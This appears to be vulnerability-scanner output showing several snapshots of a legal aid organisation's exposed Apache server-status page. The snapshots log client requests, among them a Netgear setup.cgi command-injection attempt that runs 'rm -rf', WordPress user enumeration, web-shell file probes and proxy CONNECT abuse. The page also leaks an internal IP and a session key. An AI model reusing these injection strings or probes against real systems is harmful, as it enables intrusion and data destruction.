::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-5-0/0/105. 0.005907400.00.003.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-5-0/0/19. 0.005907200.00.000.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-5-0/0/22. 0.005907300.00.001.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-4-0/0/13. 0.9712045200.00.000.66 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0041356600.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2241352400.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0041356500.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5641352500.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0041356300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0041356400.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed9a0c7f99
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 28-Nov-2025 22:56:13 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 4 Parent Server MPM Generation: 3 Server uptime: 3 days 6 hours 19 minutes 21 seconds Server load: 0.00 0.00 0.00 Total accesses: 2932 - Total Traffic: 113.1 MB CPU Usage: u75.05 s5.53 cu0 cs0 - .0286% CPU load .0104 requests/sec - 420 B/second - 39.5 kB/request 1 requests currently being processed, 9 idle workers __W.___.__._._.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-3254260/34/220_ 4.7444262470.01.999.38 130.176.187.246http/1.1elearning.alas.org:8080GET /lib/requirejs.php?file=%2F1763499490%2F/core/first.js HTTP 1-3263520/55/199_ 3.21252530.01.196.83 3.172.83.14http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-32235425/121/241W 8.980030.04.219.20 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 3-3-0/0/158. 1.58560900.00.007.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-3254310/37/258_ 5.008192270.01.789.70 20.163.5.98http/1.1atlantalegalaid.org:8080MGLNDD_52.21.209.78_8080\n 5-3263630/8/183_ 0.83442640.00.276.49 130.176.187.246http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?m/1763499490/core/event/event-min.js&m 6-3223900/37/230_ 5.274425160.01.928.40 130.176.187.246http/1.1elearning.alas.org:8080POST /lib/ajax/service.php?sesskey=hX5QtfRDmm&info=core_fetch_n 7-3-0/0/287. 7.10561000.00.009.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-3223950/38/188_ 5.00196000.01.847.64 94.156.152.6http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 9-3223700/71/148_ 9.68295300.03.617.38 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-3-0/0/271. 7.971869800.00.007.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-3223750/51/114_ 7.422586270.02.836.32 3.172.83.14http/1.1esign.alas.org:8080GET / HTTP/1.1 12-3-0/0/186. 4.44561100.00.006.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-3254410/30/107_ 3.91442500.01.305.54 130.176.187.246http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?3.17.2/event-mousewheel/event-mousewhe 14-3-0/0/97. 0.001875800.00.003.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-1-0/0/6. 0.6822024200.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-1-0/0/10. 1.3022027300.00.000.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-1-0/0/6. 0.6922024600.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0022028200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2222024000.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0022028100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5622024100.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0022027900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0022028000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed8cae83d8
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 27-Nov-2025 03:13:44 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 2 Parent Server MPM Generation: 1 Server uptime: 1 day 10 hours 36 minutes 53 seconds Server load: 0.00 0.00 0.00 Total accesses: 1692 - Total Traffic: 71.4 MB CPU Usage: u76.92 s5.77 cu0 cs0 - .0664% CPU load .0136 requests/sec - 601 B/second - 43.2 kB/request 1 requests currently being processed, 9 idle workers ._.._.___.__W__................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1-0/0/132. 8.52258100.00.005.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-183290/20/99_ 2.3425842400.00.803.85 130.176.185.39http/1.1atlantalegalaid.org:8080GET /wp-update.php HTTP/1.1 2-1-0/0/116. 6.02263700.00.004.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-1-0/0/115. 1.75258200.00.005.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-170020/61/137_ 9.0925852410.02.935.84 130.176.185.42http/1.1atlantalegalaid.org:8080GET /wp-mail.php HTTP/1.1 5-1-0/0/138. 0.67258400.00.004.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-170070/51/126_ 10.7225862140.02.525.70 130.176.185.14http/1.1atlantalegalaid.org:8080GET /wp-includes/theme-compat/ HTTP/1.1 7-170080/113/181_ 5.9825832300.03.516.07 130.176.185.17http/1.1atlantalegalaid.org:8080GET /wp.php HTTP/1.1 8-170130/58/114_ 6.8225901260.02.774.65 130.176.185.51http/1.1atlantalegalaid.org:8080GET /wp-includes/sodium_compat/index.php HTTP/1.1 9-1-0/0/77. 1.01258300.00.003.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-182350/81/133_ 6.6125832160.02.474.76 130.176.185.51http/1.1atlantalegalaid.org:8080GET /xmrlpc.php HTTP/1.1 11-182400/43/58_ 5.8425881130.02.513.29 130.176.185.6http/1.1atlantalegalaid.org:8080GET /wp-includes/style-engine/index.php HTTP/1.1 12-11341425/38/101W 2.140029.90.824.17 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 13-182500/53/71_ 7.4225872350.02.994.04 130.176.185.5http/1.1atlantalegalaid.org:8080GET /wp-includes/style-engine/ HTTP/1.1 14-1134190/15/49_ 2.3125922310.00.792.75 130.176.185.42http/1.1atlantalegalaid.org:8080GET /wp-includes/sitemaps/ HTTP/1.1 15-1-0/0/6. 0.686289300.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-1-0/0/10. 1.306292400.00.000.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-1-0/0/6. 0.696289700.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.006293300.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.226289100.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.006293200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.566289200.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.006293000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.006293100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.legalaidconnections.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed7aafbc8a
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 22-Nov-2025 23:45:03 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 593 Parent Server MPM Generation: 592 Server uptime: 592 days 6 hours 50 minutes 30 seconds Server load: 0.00 0.00 0.00 Total accesses: 13767784 - Total Traffic: 196.2 GB CPU Usage: u78.46 s6.9 cu0 cs0 - .000167% CPU load .269 requests/sec - 4116 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _W..____._..___................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-592131120/62/813374_ 0.08176600.00.1213522.90 176.65.132.210http/1.1atlantalegalaid.org:8080CONNECT 1.1.1.1:443 HTTP/1.0 1-5921314024/56/790070W 0.220028.40.2513126.81 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 2-592-0/0/758587. 0.703004100.00.0012975.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-592-0/0/740707. 0.043003900.00.0012436.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-592131100/33/720961_ 1.183610.00.3511910.08 130.176.208.182http/1.1legalaidconnections.org:8080GET / HTTP/1.1 5-592131570/32/700113_ 0.44141200.00.4811610.57 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 6-592130920/69/661126_ 0.88176630.00.1110931.83 176.65.132.210http/1.1 7-592130930/28/636264_ 2.14178600.00.2110439.70 176.65.132.210http/1.1 8-592-0/0/604008. 0.003003700.00.009832.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-592158080/59/584117_ 0.0281500.00.229232.02 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 10-592-0/0/514637. 0.003003800.00.008785.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-592-0/0/478945. 0.003003600.00.007907.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-592158230/27/415327_ 0.42176600.00.026621.13 176.65.132.210http/1.1atlantalegalaid.org:8080CONNECT 176.65.132.210:80 HTTP/1.0 13-592158280/21/328978_ 0.1518074940.00.014811.19 176.65.132.210http/1.1 14-592158330/22/289619_ 0.57117100.00.084308.48 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 15-592-0/0/265359. 0.003004400.00.003799.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-592-0/0/230553. 0.003004300.00.003443.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-592-0/0/167883. 0.003004200.00.002347.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-592-0/0/145464. 0.003004000.00.002064.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-591-0/0/137653. 0.009273900.00.002104.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-589-0/0/128327. 0.2028963300.00.001824.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-589-0/0/116787. 3.0228028100.00.001694.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-589-0/0/121177. 0.0428964100.00.001645.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-589-0/0/106169. 0.1828825000.00.001537.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-589-0/0/108758. 0.3128964200.00.001366.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-589-0/0/86009. 0.0028996300.00.001085.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-589-0/0/68650. 0.0028996200.00.001013.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-589-0/0/65111. 0.0028996100.00.00879.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-589-0/0/61981. 0.0028996000.00.00806.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-589-0/0/56797. 0.0028995900.00.00693.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-589-0/0/58169. 0.0028995800.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-589-0/0/53040. 0.0028995700.00.00675.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-589-0/0/57082. 0.0028995600.00.00733.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-589-0/0/53413. 0.0028995500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-589-0/0/56667. 0.0028995400.00.00671.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-589-0/0/56165. 0.0028995300.00.00668.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-589-0/0/54018. 0.0028995200.00.00655.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-589-0/0/50615. 0.0028995100.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-589-0/0/56921. 0.0028995000.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-589-0/0/50170. 0.0028994900.00.00563.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-589-0/0/49228. 0.0028994800.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-588-0/0/31023. 0.0036070000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-588-0/0/31949. 0.0036069900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-588-0/0/31607. 0.0036069800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-588-0/0/31940. 0.2136052700.00.00329.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-588-0/0/32832. 0.2436050100.00.00314.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001450154800.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001450154700.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001450154600.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001450154500.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001450154400.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001450154300.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001450154200.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001450154100.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001450154000.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001450153900.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001450153800.00.00294.75 ::1http/1.1atlantalegalaid.org:8080OPTI
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed623315ec
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 21-Nov-2025 01:08:04 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 591 Parent Server MPM Generation: 590 Server uptime: 590 days 8 hours 13 minutes 31 seconds Server load: 0.00 0.00 0.00 Total accesses: 13766267 - Total Traffic: 196.2 GB CPU Usage: u91.09 s8.04 cu0 cs0 - .000194% CPU load .27 requests/sec - 4129 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers __W_..__.__.__.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-590303740/63/813198_ 2.00535600.01.9213518.09 45.233.244.231http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-590307520/54/789968_ 1.89383400.00.7013125.08 80.78.75.26http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-5903038425/44/758426W 1.410030.00.3212972.92 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 3-590309920/16/740567_ 1.5845114640.00.3112434.80 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-admin/admin-post.php HTTP/1.1 4-590-0/0/720882. 3.281505100.00.0011908.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-590-0/0/700047. 2.181505200.00.0011600.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-590310010/16/660989_ 1.2445121420.00.2110929.27 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763686831.265675067901611 7-59020550/3/636110_ 0.5744511990.00.1310438.10 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-590-0/0/603928. 1.081505300.00.009829.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-59020650/11/584032_ 2.10681000.00.659231.33 36.158.74.30http/1.1atlantalegalaid.org:8080GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tm 10-59020700/3/514626_ 0.45189700.00.138785.86 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-590-0/0/478909. 0.241505400.00.007907.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-590303790/54/415239_ 1.563121720.00.386619.70 3.172.90.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-59020800/2/328939_ 0.24282900.00.074811.10 45.38.44.221http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 14-589-0/0/289593. 0.009652100.00.004308.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-589-0/0/265354. 0.009652000.00.003799.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-589-0/0/230532. 0.009651900.00.003443.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-589-0/0/167775. 0.2111752200.00.002341.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-589-0/0/145462. 0.0012182500.00.002064.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-589-0/0/137652. 0.5812182400.00.002104.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-589-0/0/128327. 0.2012181400.00.001824.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-589-0/0/116787. 3.0211246200.00.001694.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-589-0/0/121177. 0.0412182200.00.001645.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-589-0/0/106169. 0.1812043100.00.001537.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-589-0/0/108758. 0.3112182300.00.001366.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-589-0/0/86009. 0.0012214400.00.001085.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-589-0/0/68650. 0.0012214300.00.001013.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-589-0/0/65111. 0.0012214200.00.00879.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-589-0/0/61981. 0.0012214100.00.00806.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-589-0/0/56797. 0.0012214000.00.00693.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-589-0/0/58169. 0.0012213900.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-589-0/0/53040. 0.0012213800.00.00675.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-589-0/0/57082. 0.0012213700.00.00733.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-589-0/0/53413. 0.0012213600.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-589-0/0/56667. 0.0012213500.00.00671.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-589-0/0/56165. 0.0012213400.00.00668.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-589-0/0/54018. 0.0012213300.00.00655.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-589-0/0/50615. 0.0012213200.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-589-0/0/56921. 0.0012213100.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-589-0/0/50170. 0.0012213000.00.00563.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-589-0/0/49228. 0.0012212900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-588-0/0/31023. 0.0019288000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-588-0/0/31949. 0.0019287900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-588-0/0/31607. 0.0019287800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-588-0/0/31940. 0.2119270700.00.00329.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-588-0/0/32832. 0.2419268200.00.00314.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001433372900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001433372800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001433372700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001433372600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001433372500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001433372400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001433372300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001433372200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001433372100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001433372000.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edd757cd6d
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 16-Nov-2025 18:24:57 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 587 Parent Server MPM Generation: 586 Server uptime: 586 days 1 hour 30 minutes 23 seconds Server load: 0.00 0.00 0.00 Total accesses: 13762480 - Total Traffic: 195.8 GB CPU Usage: u312.2 s26.8 cu0 cs0 - .000669% CPU load .272 requests/sec - 4152 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ..._____W__.__.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-586-0/0/812885. 2.072341200.00.0013481.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-586-0/0/789729. 2.782341300.00.0013084.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-586-0/0/758140. 1.882340900.00.0012948.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-586316880/17/740317_ 2.2951031750.00.6512419.10 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763312386.617458105087280 4-586316950/53/720599_ 2.83326100.00.8311893.33 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-586317040/20/699811_ 3.00205000.01.0111567.03 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-586303450/54/660754_ 9.8650932740.00.9510905.96 130.176.208.182http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 7-586317090/86/635850_ 3.2050582220.00.8610403.46 3.172.13.83http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 8-5863034625/48/603729W 3.760030.00.959814.79 130.176.208.182http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 9-586324160/18/583789_ 3.2250952980.00.989225.54 130.176.208.182http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 10-586324210/52/514459_ 2.9650992610.01.008754.96 130.176.208.182http/1.1atlantalegalaid.org:8080GET /@vite/env HTTP/1.1 11-586-0/0/478799. 2.132341100.00.007904.95 